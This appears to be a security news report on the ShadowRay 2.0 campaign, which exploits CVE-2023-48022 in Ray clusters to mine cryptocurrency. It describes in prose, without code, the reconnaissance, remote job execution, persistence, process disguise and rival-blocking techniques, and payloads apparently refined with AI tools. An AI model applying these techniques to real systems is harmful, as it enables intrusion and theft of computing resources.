Cybersecurity researchers have identified a sophisticated global hacking campaign, dubbed ShadowRay 2.0, actively exploiting a vulnerability in the widely-used Ray AI framework. This ongoing attack silently compromises powerful AI computing clusters, repurposing them for cryptocurrency mining operations by leveraging CVE-2023-48022. The campaign represents a significant escalation from its initial discovery, with attackers employing advanced tactics to remain undetected while maximizing illicit gains from compromised infrastructures.
Oligo Security researchers detailed the campaign, which began in early November 2025, highlighting threat actors operating under the moniker IronErn440. These attackers have weaponized Ray’s legitimate orchestration features, transforming them into tools for self-propagating attacks. The scale of the threat is substantial, with the number of exposed Ray servers globally surging from thousands during the initial discovery to over 230,000 instances. These compromised servers are frequently part of active startups, research laboratories, and cloud-hosting providers, creating a vast attack surface.
AI Attacking AI Infrastructure with ShadowRay 2.0 at its Core
The ShadowRay 2.0 attack unfolds through a series of coordinated stages, commencing with reconnaissance facilitated by interact.sh. This out-of-band platform allows attackers to pinpoint vulnerable servers without resorting to traditional, easily detectable scanning methods. Attackers probe Ray’s unprotected Jobs API, triggering callbacks from the vulnerable instances. Once targets are identified, they exploit the unauthenticated Ray dashboard to submit malicious jobs, enabling the execution of arbitrary code with cluster-level privileges.
A particularly alarming aspect of this campaign is the use of AI-generated payloads. The attackers deploy custom Python code that autonomously identifies available cluster resources. To evade immediate detection, these payloads allocate approximately 60 percent of CPU and GPU resources before injecting cryptocurrency miners masked as legitimate system processes. The payloads demonstrate advanced error handling and self-adaptation capabilities, strongly suggesting they were generated or refined using AI tools to expedite payload development and deployment.
The infection mechanism is multi-stage. The initial access payload utilizes Ray’s NodeAffinitySchedulingStrategy to enumerate cluster nodes and distribute infection scripts to each one. One critical code snippet illustrates this process, where attackers query for alive nodes and then execute a wget command to download and run an anonymized shell script.
Persistence within the compromised systems is established through multiple vectors. These include cron jobs that execute every fifteen minutes, hijacking of systemd services, and the injection of SSH keys into root accounts. To further camouflage their activities, the attackers rename malicious processes to mimic legitimate kernel workers like “[kworker/0:0]” and typicaldns-filter services, effectively hiding their presence in plain sight.
What distinguishes this campaign is the evident competition among attackers. The deployed scripts are designed to detect and terminate rival cryptocurrency miners. Furthermore, the attackers actively block competing mining pools by implementing iptables rules and modifying host files. They even target pools utilizing specific ports known to be used by competing threat actors, pointing to a complex underground ecosystem where multiple criminal groups vie for control of the same compromised resources.
The adaptability of the attackers’ infrastructure is also a significant concern. For victims located in China, region-specific payloads are delivered through proxy services to circumvent network restrictions. Geographic detection is performed using services like ip-api.com, allowing attackers to execute different scripts for Chinese versus international targets. The attackers continuously update their payloads by committing changes to GitLab, treating their infrastructure as code. This enables real-time evolution of their attack techniques without the need to redeploy to victim machines, showcasing a highly agile and adaptive threat.
The ongoing evolution of ShadowRay 2.0 and the sheer scale of exposed Ray instances indicate a persistent and growing threat to AI infrastructure. Organizations utilizing Ray are encouraged to review their security configurations, ensure all instances are patched and secured, and implement robust monitoring to detect anomalous activity. The dynamic nature of this campaign suggests continued adaptation from threat actors, making vigilance and proactive security measures crucial for defending against these evolving AI-centric attacks.